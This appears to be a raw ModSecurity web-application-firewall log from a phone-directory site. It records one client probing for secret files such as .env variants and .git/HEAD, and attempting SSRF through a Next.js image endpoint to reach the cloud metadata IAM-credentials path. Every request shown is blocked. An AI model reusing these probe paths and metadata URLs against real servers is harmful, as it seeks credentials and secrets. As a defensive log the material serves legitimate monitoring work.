[Mon May 11 15:23:06.869737 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:45826] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYOqt2WtvoFr7xvGzUKwAAAIM"]
[Mon May 11 15:23:06.869907 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:45826] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYOqt2WtvoFr7xvGzUKwAAAIM"]
[Mon May 11 15:23:06.884517 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYOuJEyNRN152ArOSMlwAAAEA"]
[Mon May 11 15:23:06.885134 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYOuJEyNRN152ArOSMlwAAAEA"]
[Mon May 11 15:23:06.885323 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYOuJEyNRN152ArOSMlwAAAEA"]
[Mon May 11 15:23:06.919574 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYOuJEyNRN152ArOSMmwAAAEA"]
[Mon May 11 15:23:06.920204 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYOuJEyNRN152ArOSMmwAAAEA"]
[Mon May 11 15:23:06.920389 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYOuJEyNRN152ArOSMmwAAAEA"]
[Mon May 11 15:23:06.929001 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqt2WtvoFr7xvGzULwAAAJQ"]
[Mon May 11 15:23:06.929120 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqt2WtvoFr7xvGzULwAAAJQ"]
[Mon May 11 15:23:06.929308 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOqt2WtvoFr7xvGzULwAAAJQ"]
[Mon May 11 15:23:06.936987 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYOuJEyNRN152ArOSMnAAAAEA"]
[Mon May 11 15:23:06.937562 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYOuJEyNRN152ArOSMnAAAAEA"]
[Mon May 11 15:23:06.937746 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYOuJEyNRN152ArOSMnAAAAEA"]
[Mon May 11 15:23:06.948568 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYOqt2WtvoFr7xvGzUMAAAAJQ"]
[Mon May 11 15:23:06.948684 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYOqt2WtvoFr7xvGzUMAAAAJQ"]
[Mon May 11 15:23:06.948861 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYOqt2WtvoFr7xvGzUMAAAAJQ"]
[Mon May 11 15:23:06.960085 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:45810] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOuSQ-m-m0ukSShuBsgAAAUk"]
[Mon May 11 15:23:06.960228 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:45810] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOuSQ-m-m0ukSShuBsgAAAUk"]
[Mon May 11 15:23:06.960415 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:45810] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOuSQ-m-m0ukSShuBsgAAAUk"]
[Mon May 11 15:23:06.977527 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOuJEyNRN152ArOSMngAAAEA"]
[Mon May 11 15:23:06.977641 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOuJEyNRN152ArOSMngAAAEA"]
[Mon May 11 15:23:06.977813 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.133:45924] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYOuJEyNRN152ArOSMngAAAEA"]
[Mon May 11 15:23:06.994576 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYOqt2WtvoFr7xvGzUMgAAAJQ"]
[Mon May 11 15:23:06.994705 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYOqt2WtvoFr7xvGzUMgAAAJQ"]
[Mon May 11 15:23:06.994888 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYOqt2WtvoFr7xvGzUMgAAAJQ"]
[Mon May 11 15:23:07.013860 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYO6t2WtvoFr7xvGzUMwAAAJQ"]
[Mon May 11 15:23:07.013992 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYO6t2WtvoFr7xvGzUMwAAAJQ"]
[Mon May 11 15:23:07.014187 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:45800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYO6t2WtvoFr7xvGzUMwAAAJQ"]
[Mon May 11 15:23:08.652604 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:46126] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYPKy-5-wpj6Sx56aYnAAAAAk"]
[Mon May 11 15:23:08.652779 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:46126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYPKy-5-wpj6Sx56aYnAAAAAk"]
[Mon May 11 15:23:08.652947 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:46084] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYPKy-5-wpj6Sx56aYnQAAAAY"]
[Mon May 11 15:23:08.652992 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:46126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYPKy-5-wpj6Sx56aYnAAAAAk"]
[Mon May 11 15:23:08.653115 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:46084] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYPKy-5-wpj6Sx56aYnQAAAAY"]
[Mon May 11 15:23:08.653338 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:46084] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYPKy-5-wpj6Sx56aYnQAAAAY"]
[Mon May 11 15:23:08.654038 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYPKO9RdIr1DwxYR2SkQAAAMY"]
[Mon May 11 15:23:08.654292 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYPKO9RdIr1DwxYR2SkQAAAMY"]
[Mon May 11 15:23:08.654585 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYPKO9RdIr1DwxYR2SkQAAAMY"]
[Mon May 11 15:23:08.655883 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:46100] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYPKy-5-wpj6Sx56aYngAAAA0"]
